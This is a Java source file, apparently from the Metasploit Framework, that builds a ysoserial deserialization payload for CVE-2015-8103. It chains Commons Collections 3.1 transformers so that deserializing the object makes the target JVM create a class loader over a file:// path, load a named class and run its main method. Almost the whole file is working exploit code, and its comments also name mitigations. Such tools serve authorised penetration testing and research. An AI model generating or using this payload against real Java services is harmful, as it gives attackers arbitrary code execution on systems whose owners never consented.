GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/ClassLoaderInvoker.java
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Requires:
commons-collections
*/
/**
 * ysoserial payload generator built on the Commons Collections 3.1 transformer classes
 * ({@code ChainedTransformer}, {@code ConstantTransformer}, {@code InvokerTransformer},
 * {@code LazyMap}).
 *
 * <p>The object graph returned by {@link #getObject(String)} carries a transformer chain
 * that, when evaluated, reflectively creates a {@link URLClassLoader} over a {@code file://}
 * URL, loads a named class through it and invokes that class's static
 * {@code main(String[])} with an empty argument array.
 *
 * <p>Defensive relevance: the chain depends on the deserializing JVM having
 * commons-collections 3.1 on its classpath and accepting serialized
 * {@code InvokerTransformer} instances. Restricting deserialized classes (for example with
 * {@code java.io.ObjectInputFilter}) or moving to a Commons Collections release that refuses
 * to deserialize {@code InvokerTransformer} by default (3.2.2 and later) breaks it.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
public class ClassLoaderInvoker extends PayloadRunner implements ObjectPayload<InvocationHandler> {

    /**
     * Builds the payload object for this gadget chain.
     *
     * @param command two space-separated tokens: the path that is appended to
     *     {@code "file://"} to form the class-loader URL, then the name of the class to load
     * @return the invocation handler wrapping the armed {@code LazyMap}
     * @throws Exception if the URL cannot be built or a helper call fails; a command with
     *     fewer than two tokens fails with {@link ArrayIndexOutOfBoundsException}
     */
    public InvocationHandler getObject(final String command) throws Exception {
        // No validation of the token count: a missing second token fails on the index below.
        String[] tokens = command.split(" ");
        String classLocation = tokens[0];
        String targetClassName = tokens[1];
        URL[] loaderUrls = { new URL("file://" + classLocation) };

        // Harmless one-step chain that is in place while the proxy and handler are built, so
        // that any map access during construction only yields the constant 1.
        Transformer placeholderChain = new ChainedTransformer(
                new Transformer[] { new ConstantTransformer(1) });

        // Steps of the chain that replaces the placeholder once construction is finished.
        Transformer seedLoaderClass = new ConstantTransformer(URLClassLoader.class);

        // URLClassLoader.class.getMethod("newInstance", URL[].class)
        Transformer lookUpFactory = new InvokerTransformer(
                "getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "newInstance", new Class[] { URL[].class } });

        // newInstance.invoke(null, loaderUrls): static call, yields a URLClassLoader
        Transformer callFactory = new InvokerTransformer(
                "invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[] { loaderUrls } });

        // loader.loadClass(targetClassName)
        Transformer loadTarget = new InvokerTransformer(
                "loadClass",
                new Class[] { String.class },
                new Object[] { targetClassName });

        // loadedClass.getMethod("main", String[].class)
        Transformer lookUpMain = new InvokerTransformer(
                "getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "main", new Class[] { String[].class } });

        // main.invoke(null, new String[0]): static call with no arguments
        Transformer callMain = new InvokerTransformer(
                "invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[] { new String[] {} } });

        // The chain ends on a constant so its overall result is the Integer 1.
        Transformer finishWithConstant = new ConstantTransformer(1);

        Transformer[] liveSteps = {
            seedLoaderClass,
            lookUpFactory,
            callFactory,
            loadTarget,
            lookUpMain,
            callMain,
            finishWithConstant
        };

        // LazyMap runs its transformer to produce a value for a key it does not yet hold.
        Map backingMap = new HashMap();
        Map decoratedMap = LazyMap.decorate(backingMap, placeholderChain);

        // Gadgets helpers are defined elsewhere; presumably they wrap the map so that
        // deserialization reaches a lookup on it. Confirm against ysoserial.payloads.util.Gadgets.
        Map proxiedMap = Gadgets.createMemoitizedProxy(decoratedMap, Map.class);
        InvocationHandler result = Gadgets.createMemoizedInvocationHandler(proxiedMap);

        // Swap the live steps in only now, after every helper call above has completed.
        Reflections.setFieldValue(placeholderChain, "iTransformers", liveSteps);

        return result;
    }

    /**
     * Command-line entry point; hands this payload class and the arguments to
     * {@link PayloadRunner#run}.
     *
     * @param args command-line arguments, passed through unchanged
     * @throws Exception if the runner fails
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(ClassLoaderInvoker.class, args);
    }
}